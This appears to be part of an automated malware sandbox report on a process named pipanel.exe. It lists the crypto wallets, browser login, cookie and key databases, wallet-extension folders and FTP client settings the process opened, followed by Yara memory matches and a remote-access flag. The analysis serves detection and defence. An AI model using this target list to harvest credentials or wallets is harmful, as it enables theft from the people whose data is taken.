Source: pipanel.exe, 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: pipanel.exe String found in binary or memory: Wallets/ElectronCash
Source: pipanel.exe String found in binary or memory: Jaxx Liberty
Source: pipanel.exe, 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: pipanel.exe String found in binary or memory: ExodusWeb3
Source: pipanel.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp String found in binary or memory: get_MachineKeyStore
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: Yara match File source: 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3177229776.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3149305764.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3153999700.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199843354.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3223397181.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199093402.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199380721.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3226874929.000000000328F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3150414400.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP